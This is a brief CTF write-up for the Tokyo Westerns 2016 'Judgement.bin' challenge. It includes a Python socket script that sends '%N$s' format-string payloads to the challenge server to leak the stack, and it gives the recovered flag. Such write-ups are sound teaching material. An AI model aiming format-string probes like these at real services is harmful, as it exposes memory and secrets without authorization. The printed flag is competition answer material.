#CTF #Python #Sockets #Binary_Exploitation
Tokyo Westerns 2016 was this past weekend and one of the challenges (Judgement.bin) had you connect to a remote listener and send it something. It was vuln to string format so we could leak the stack. Printing the stack:#!/usr/bin/env python import socket for i in range(50): csock = socket.socket() csock.connect(('pwn1.chal.ctf.westerns.tokyo', 31729)) csock.send("%{}$s\n".format(i)) x = csock.recv(1024) if 'TWCTF' in x: print(x) break
Input flag >> TWCTF{R3:l1f3_1n_4_pwn_w0rld_fr0m_z3r0}